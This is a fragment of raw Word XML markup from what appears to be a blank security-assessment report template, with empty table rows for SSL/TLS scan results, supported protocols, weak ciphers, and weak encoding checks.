          <w:p w14:paraId="192CF7B7" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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D53BBB" w:rsidRPr="00D53BBB" w14:paraId="4A8190EA" w14:textId="77777777" w:rsidTr="007671C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2FFE9889" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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Performed SSL Scans</w:t>
            </w:r>
            <w:r w:rsidRPr="00D53BBB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and SSL Tests Successfully</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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52E8B85" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BBB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="698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D53BBB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64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5AB5FA7" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BBB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D53BBB">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
                <w:kern w:val="0"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">No </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B64384" w:rsidRPr="00D53BBB" w14:paraId="5C413E43" w14:textId="77777777" w:rsidTr="007671C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7915BF41" w14:textId="7CE927F8" w:rsidR="00B64384" w:rsidRPr="00D53BBB" w:rsidRDefault="00B64384" w:rsidP="007671C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B64384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SSL/TLS Services Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="297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2572A08" w14:textId="18385541" w:rsidR="00B64384" w:rsidRPr="00D53BBB" w:rsidRDefault="00B64384" w:rsidP="00D53BBB">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="1"/>
              </w:numPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="698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64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4F453D6" w14:textId="4A76BDE7" w:rsidR="00B64384" w:rsidRPr="00D53BBB" w:rsidRDefault="00B64384" w:rsidP="00D53BBB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B64384" w:rsidRPr="00D53BBB" w14:paraId="4351D8B8" w14:textId="77777777" w:rsidTr="007671C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3CC66C25" w14:textId="7E3D63FD" w:rsidR="00B64384" w:rsidRPr="00B64384" w:rsidRDefault="00B64384" w:rsidP="007671C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B64384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SSL/TLS Certificate Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67FDA15B" w14:textId="77777777" w:rsidR="00B64384" w:rsidRPr="00B64384" w:rsidRDefault="00B64384" w:rsidP="00B64384">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="left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B64384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[*Issuer, Expiry Date, Weak Signature Algorithms, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C0506DF" w14:textId="77777777" w:rsidR="00B64384" w:rsidRDefault="00B64384" w:rsidP="00B64384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  <w:p w14:paraId="75E0921A" w14:textId="30813A67" w:rsidR="00B64384" w:rsidRDefault="00B64384" w:rsidP="00B64384">
            <w:pPr>
              <w:spacing w:before="60" w:after="60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D53BBB" w:rsidRPr="00D53BBB" w14:paraId="4289AF97" w14:textId="77777777" w:rsidTr="007671C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67A1359A" w14:textId="771E4F0C" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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 xml:space="preserve">Identified SSL Services related to Web </w:t>
            </w:r>
            <w:r w:rsidR="00942712" w:rsidRPr="00D53BBB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E92318F" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="183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  <w:p w14:paraId="398401E8" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="1849FBA6" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="6947C507" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="015E8074" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="21728CA1" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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</w:tr>
      <w:tr w:rsidR="000D4CFE" w:rsidRPr="00D53BBB" w14:paraId="6356CCE4" w14:textId="77777777" w:rsidTr="007671C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5CA60A91" w14:textId="5E6146C8" w:rsidR="000D4CFE" w:rsidRPr="00D53BBB" w:rsidRDefault="000D4CFE" w:rsidP="007671C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D4CFE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Supported Protocols Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF5DEE9" w14:textId="77777777" w:rsidR="000D4CFE" w:rsidRPr="000D4CFE" w:rsidRDefault="000D4CFE" w:rsidP="000D4CF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Cs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000D4CFE">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>[*TLS 1.0, TLS 1.1, TLS 1.2, TLS 1.3, SSLv2, SSLv3, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59DE7896" w14:textId="77777777" w:rsidR="000D4CFE" w:rsidRDefault="000D4CFE" w:rsidP="000D4CF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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0C8000FC" w14:textId="77777777" w:rsidR="007671CB" w:rsidRDefault="007671CB" w:rsidP="000D4CF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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="68F03CBB" w14:textId="52AE7AB3" w:rsidR="007671CB" w:rsidRPr="000D4CFE" w:rsidRDefault="007671CB" w:rsidP="000D4CF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Cs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w14:paraId="0E99E98D" w14:textId="77777777" w:rsidTr="007671C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3722148D" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>List of Ciphers related to Target Web Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="317B3B8B" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="5FA80090" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="186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  <w:p w14:paraId="4B2A6F93" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="36073D62" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="4ECAB06B" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="50DECE37" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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</w:tr>
      <w:tr w:rsidR="00754F86" w:rsidRPr="00D53BBB" w14:paraId="0165900D" w14:textId="77777777" w:rsidTr="007671C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4E43E563" w14:textId="13E11122" w:rsidR="00754F86" w:rsidRPr="00D53BBB" w:rsidRDefault="00754F86" w:rsidP="007671C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54F86">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Weak/Insecure Ciphers Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74FF8257" w14:textId="77777777" w:rsidR="00754F86" w:rsidRDefault="00754F86" w:rsidP="00754F8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Cs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00754F86">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>[*Yes/No, List of Weak Ciphers if found]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BF34BF3" w14:textId="77777777" w:rsidR="00754F86" w:rsidRDefault="00754F86" w:rsidP="00754F8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Cs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4AC67044" w14:textId="77777777" w:rsidR="00754F86" w:rsidRDefault="00754F86" w:rsidP="00754F8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Cs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="238E82C6" w14:textId="77777777" w:rsidR="007671CB" w:rsidRDefault="007671CB" w:rsidP="00754F8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Cs/>
                <w:i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DC3F39D" w14:textId="35D71928" w:rsidR="007671CB" w:rsidRPr="00754F86" w:rsidRDefault="007671CB" w:rsidP="00754F8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Cs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53BBB" w:rsidRPr="00D53BBB" w14:paraId="1B8B7BA9" w14:textId="77777777" w:rsidTr="007671C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41A18A55" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB"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 Vulnerabilities in SSL Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D44BCFD" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="01131526" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="541F012F" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="447D52A0" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="16D78E4F" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="667B196E" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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</w:tr>
      <w:tr w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w14:paraId="491AC564" w14:textId="77777777" w:rsidTr="007671C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5113CF0C" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="007671C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53BBB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615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFAD23A" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="545FF73A" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="009C452A" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="06160E9D" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="173B52EA" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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  <w:p w14:paraId="59E88A9E" w14:textId="77777777" w:rsidR="00D53BBB" w:rsidRPr="00D53BBB" w:rsidRDefault="00D53BBB" w:rsidP="00D53BB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</w:tr>
      <w:tr w:rsidR="00C73FBD" w:rsidRPr="00D53BBB" w14:paraId="38425A6C" w14:textId="77777777" w:rsidTr="007671CB">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2745" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0346DCC3" w14:textId="4985BBCA" w:rsidR="00C73FBD" w:rsidRPr="00D53BBB" w:rsidRDefault="00C73FBD" w:rsidP="007671C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b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Result Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6615" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2589720A" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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4E8B2B1" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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E1BE79A" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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F90B45E" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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08FD099" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00D53BBB" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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</w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FE520D5" w14:textId="5423B8CF" w:rsidR="00873243" w:rsidRDefault="00873243" w:rsidP="00C73FBD">
      <w:pPr>
        <w:jc w:val="left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C73FBD" w:rsidRPr="00A51A96" w14:paraId="411265ED" w14:textId="77777777" w:rsidTr="008E7163">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="755B0D19" w14:textId="7A8641A0" w:rsidR="00C73FBD" w:rsidRPr="003C713F" w:rsidRDefault="00C73FBD" w:rsidP="00972D9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10.3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C73FBD">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Check for Weak Encoding Techniques</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="33917117" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="008E7163" w:rsidRDefault="00C73FBD" w:rsidP="00C73FBD">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="4"/>
          <w:szCs w:val="4"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="94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5"/>
        <w:gridCol w:w="2373"/>
        <w:gridCol w:w="6862"/>
        <w:gridCol w:w="125"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w14:paraId="26E47672" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="199E05C0" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E4F650C" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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73FBD" w:rsidRPr="00C73FBD" w14:paraId="1F1A6C27" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25A0BB46" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="223D2753" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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73FBD" w:rsidRPr="00C73FBD" w14:paraId="6D44FCA2" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="53B3D534" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD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3FBD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862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35071F35" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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73FBD" w:rsidRPr="00C73FBD" w14:paraId="073C7AC8" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="2330"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A9CBE87" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD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C73FBD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URLs/Queries Used </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A45F545" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="187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8DF22B2" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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342DD36" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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72D0C3B" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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63ADBF8" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="18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B159D32" w14:textId="77777777" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="00C73FBD" w:rsidP="00C73FB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8486F" w:rsidRPr="00C73FBD" w14:paraId="0B8B11DE" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="1079"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="363F089F" w14:textId="5F763660" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F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C73FBD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Encoding Methods Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5510DA30" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="0078486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C73FB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[*Base64, URL Encoding, MD5, Weak Hashing, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="028F5110" w14:textId="77777777" w:rsidR="0078486F" w:rsidRDefault="0078486F" w:rsidP="0078486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8EB077D" w14:textId="77777777" w:rsidR="0078486F" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F" w:rsidP="0078486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73FBD" w:rsidRPr="00C73FBD" w14:paraId="4CAB959C" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62ABF77A" w14:textId="68ED0504" w:rsidR="00C73FBD" w:rsidRPr="00C73FBD" w:rsidRDefault="0078486F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78486F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Sensitive Data Encoded in URL Parameters?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6862" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A41E2ED" w14:textId="0C4ABF66" w:rsidR="00C73FBD" w:rsidRPr="0078486F" w:rsidRDefault="0078486F" w:rsidP="00C73FB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78486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[*Yes/No, Decoded Data if found]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D9021C" w:rsidRPr="00C73FBD" w14:paraId="45817C5B" w14:textId="77777777" w:rsidTr="008E7163">
        <w:trPr>
          <w:gridAfter w:val="1"/>
          <w:wAfter w:w="125" w:type="dxa"/>
          <w:trHeight w:val="647"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2498" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
            <w:vAlign w:val="center"/>
